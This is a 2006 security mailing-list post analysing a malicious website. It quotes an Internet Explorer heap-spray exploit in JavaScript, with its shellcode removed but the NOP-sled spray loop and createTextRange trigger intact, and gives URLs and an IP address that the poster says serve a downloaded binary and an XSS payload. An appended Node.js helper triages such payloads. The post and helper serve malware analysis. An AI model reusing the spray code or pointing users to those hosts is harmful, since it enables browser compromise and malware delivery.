[Dailydave] RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: C programming List (cprog.list at gmail.com)
Date: Tue Apr 18 2006 - 16:54:23 CDT
> The top page a level above that is quite interesting too. Although I'd only
> recommend browsing it with wget and notepad, to be on the safe side. Should
> someone perhaps notify all those banks mentioned? (Then again, telling them
> "Watch out for suspicious CC transactions from eastern European nations"
> probably isn't telling them anything they don't already know....)
>
>
> cheers,
> DaveK
Looking at the front page in my regular browsers (firefox, galeon,
konqueror), all three die; apparently, from what I see, the browser
makes repetitive calls to mmap2:
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x8af82000
I don't know what he wants, but apparently it is just to map as much
memory as possible. Does anyone know what script he uses to generate this?
There is also http://www.w00tynetwork.com/news.htm which has what I
believe is an Internet Explorer exploit, maybe another browser, but Windows
oriented.
<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">
shellcode = unescape(
/* %u-encoded payload blob removed */
);
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000)
block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;
var r = document.getElementById('javascript').createTextRange();
</script>
This shellcode downloads and execs this binary:
http://www.w00tynetwork.com/binary2.exe. Does anyone know what the binary
does?
I've tried to get the file that the XSS is going to download, but the
address never replies.
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a company named Ceraco International Co., Ltd.,
which I guess is a drone..
Does anyone have any more on this web?
-daniel
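The %u-escaped blob and spray loop quoted above, looked at from the analyst's side, as an added example that is not code from the mail or from the site it describes: it decodes the escapes into the bytes they occupy in memory, measures the NOP sled, pulls printable strings (which is how a download URL inside a payload surfaces without disassembly) and flags the array-fill and createTextRange pattern. It runs under Node; the sample input is constructed, not the payload from the mail.

```javascript
// Added example, not code from the mail: triage helper for a %u-escaped
// payload. Each %uXXXX becomes one UTF-16 unit, stored low byte first.
function decodeUnicodeEscapes(js) {
  const bytes = [];
  for (const m of js.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);   // low byte, then high byte
  }
  return Buffer.from(bytes);
}
// Longest run of 0x90 (x86 NOP): the sled a spray relies on so that an
// imprecise jump still slides into the payload.
function longestNopRun(buf) {
  let best = 0, cur = 0;
  for (const b of buf) {
    cur = b === 0x90 ? cur + 1 : 0;
    if (cur > best) best = cur;
  }
  return best;
}
// Printable ASCII runs: URLs or DLL names inside the payload show up here
// without any disassembly.
function printableStrings(buf, minLen = 4) {
  const out = [];
  let cur = '';
  for (const b of buf) {
    if (b >= 0x20 && b <= 0x7e) { cur += String.fromCharCode(b); continue; }
    if (cur.length >= minLen) out.push(cur);
    cur = '';
  }
  if (cur.length >= minLen) out.push(cur);
  return out;
}
function triage(js) {
  const buf = decodeUnicodeEscapes(js);
  return {
    byteLength: buf.length,
    nopRun: longestNopRun(buf),
    strings: printableStrings(buf),
    // Crude static indicators of the pattern quoted above; heuristics only.
    usesTextRange: /createTextRange\s*\(/.test(js),
    fillsLargeArray: /new Array\s*\(\s*\)/.test(js) && /for\s*\([^)]*<\s*\d{3,}/.test(js),
  };
}
// Constructed sample (not the mail's payload): a short NOP sled, then "http://www".
const SAMPLE = 'memory = new Array(); for (i = 0; i < 2020; i++) memory[i] = block + sc; ' +
  'sc = unescape("%u9090%u9090%u9090%u9090%u7468%u7074%u2F3A%u772F%u7777%u6500");' +
  ' var r = document.getElementById("javascript").createTextRange();';
```

Call `triage(SAMPLE)` to get the byte count, sled length, recovered strings and the two pattern flags for a page you have saved to disk.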